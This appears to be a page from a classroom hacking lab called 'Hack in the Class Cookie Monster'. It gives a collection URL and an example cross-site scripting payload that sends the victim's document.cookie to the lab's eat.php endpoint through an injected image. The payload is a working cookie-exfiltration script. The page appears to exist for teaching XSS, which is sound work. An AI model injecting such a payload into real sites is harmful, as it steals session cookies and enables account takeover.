Hack in the Class Cookie Monster
To feed the cookie monster, use this url:
https://cookie-monster.lab.hackintheclass.org/eat.php?monster=ohv9jsg5pne06g0ntuaqrura4s&cookie=THECOOKIEYOUWANTTOGIVEExample XSS:
<script type="text/javascript">
var img = document.createElement("img");
img.src="https://cookie-monster.lab.hackintheclass.org" +
"/eat.php?monster=ohv9jsg5pne06g0ntuaqrura4s" +
"&cookie=" + encodeURIComponent(document.cookie);
document.body.appendChild(img);
</script>
Your cookie monster has eaten these cookies:
No cookies yet.